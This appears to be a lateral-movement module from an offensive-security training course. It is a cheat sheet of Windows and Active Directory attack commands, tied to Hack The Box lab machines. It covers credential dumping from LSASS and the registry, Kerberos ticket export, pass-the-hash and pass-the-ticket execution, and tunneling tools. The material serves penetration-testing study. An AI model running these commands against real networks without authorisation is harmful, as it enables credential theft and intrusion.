Back to All Modules

09 - Lateral Movement

#Overview

Lateral movement is the phase where an attacker pivots from their initial foothold to other systems within the target environment. The goal is to expand access, locate sensitive data, and ultimately reach high-value targets such as domain controllers, file servers, or databases. Lateral movement techniques leverage captured credentials, hashes, tickets, and certificates to authenticate to remote systems through a variety of protocols (SMB, WinRM, RDP, WMI, SSH).

#Methodology

#Phase 1: Discovery (Where to Go)

# Network reconnaissance from compromised host
ipconfig /all                                          # Windows: identify network segments
route print                                            # Routing table
net view /domain                                       # List domain computers
arp -a                                                 # ARP table (neighbors)
netstat -ano | findstr ESTABLISHED                     # Active connections

# Domain enumeration
net group "Domain Computers" /domain                   # All domain-joined computers
nltest /dclist:<domain>                                # List domain controllers
crackmapexec smb <subnet>                              # Discover SMB hosts
BASH

#Phase 2: Credential Gathering

# Memory
mimikatz # sekurlsa::logonpasswords
lsassy <IP> -u <user> -p <pass>                        # Remote LSASS dump
procdump -ma lsass.exe lsass.dmp                        # Dump LSASS

# Files
findstr /si password *.txt *.ini *.config *.xml          # Windows
grep -rni "password\|secret\|key" /var/www/ 2>/dev/null   # Linux

# Registry
reg query HKLM /f password /t REG_SZ /s                  # Credentials in registry

# Tickets
mimikatz # sekurlsa::tickets /export
Rubeus.exe dump
BASH

#Phase 3: Movement Method Selection

Credential TypeBest Method
Plaintext passwordWinRM, RDP, SSH, PsExec, WMIExec
NTLM hashPTH (PsExec, WMIExec, WinRM, SMBExec, Atexec)
Kerberos ticketPTT (PsExec, WMIExec with ticket)
PFX certificatePTC (WinRM, RDP with cert)
SSH private keySSH lateral movement
AES256/RC4 keyOverpass-the-Hash -> TGT -> PTT

#Phase 4: Execution Decision Tree

Have credentials ->
  Port 5985/5986 open -> evil-winrm (interactive PowerShell)
  Port 445 only -> impacket-psexec (service-based, ADMIN$ required)
                 -> impacket-wmiexec (WMI-based, quieter)
                 -> impacket-smbexec (named pipes, semi-interactive)
                 -> impacket-atexec (scheduled task)
  Port 3389 -> xfreerdp /pth (Restricted Admin mode)
  Port 22 -> SSH with key or password
  All blocked -> WMI via DCOM, PowerShell Remoting (5985/5986)

Have NTLM hash ->
  Local admin on target -> PTH via any SMB-based impacket tool
  WinRM enabled -> evil-winrm -H
  RDP Restricted Admin enabled -> xfreerdp /pth

Have Kerberos ticket ->
  Export from compromised host -> PTT -> netexec/impacket with -k flag
  Overpass-the-Hash -> request TGT -> PTT

Have certificate ->
  PTC via certipy auth -> extract NT hash -> PTH
TEXT

#Key Considerations

  • Double-hop problem: Credentials do not flow beyond the initial target. Use CredSSP, explicit credentials, or ticket-based auth.
  • SMB signing: If required, NTLM relay is blocked but PTH still works.
  • Firewall rules: WinRM (5985), RDP (3389), and SMB (445) may be blocked between network segments.
  • Time synchronization: Kerberos requires attacker clock within 5 minutes of DC: sudo ntpdate -u <DC_IP>.

#Cross-References

#Tool References

ToolLink
netexechttps://github.com/Porchetta-Industries/CrackMapExec
impackethttps://github.com/fortra/impacket
evil-winrmhttps://github.com/Hackplayers/evil-winrm
mimikatzhttps://github.com/gentilkiwi/mimikatz
Rubeushttps://github.com/GhostPack/Rubeus
certipy-adhttps://github.com/ly4k/Certipy

#Source Machines

  • Cascade (Medium, AD) - Lateral movement via Audit share access and service accounts
  • Escape (Medium, AD) - MSSQL linked server lateral movement, PTH to Administrator
  • Flight (Hard, AD) - SMB share write -> hash theft -> lateral movement through multiple user contexts
  • Fluffy (Easy, AD) - ACL-based lateral movement through service accounts
  • Blackfield (Hard, AD) - ForceChangePassword for lateral movement to audit2020
  • Return (Easy, AD) - Server Operators group abuse for service manipulation

#Pivoting and Tunneling

#Quick Reference

ToolTypeCommand
Ligolo-ngSOCKS/Tunneldocker run -it --rm -p 11601:11601 nicocha30/ligolo-ng-proxy
ChiselSOCKS Proxy./chisel server -p 6666 --reverse --auth user:pass --tls
SSH -DDynamic SOCKSssh -D 1080 user@pivot
SSH -LLocal Forwardssh -L 8080:127.0.0.1:80 user@pivot
SSH -RRemote Forwardssh -R 8080:127.0.0.1:80 user@pivot
proxychains4SOCKS Clientproxychains4 -q nxc smb target
socatTCP Relaysocat TCP-LISTEN:8080,fork TCP:10.10.10.10:80
netshWindows PortProxynetsh interface portproxy add v4tov4 ...
dnscat2DNS Tunnelruby dnscat2.rb domain.com
httptunnelHTTP Tunnelhts -F 8888 10.10.10.10:80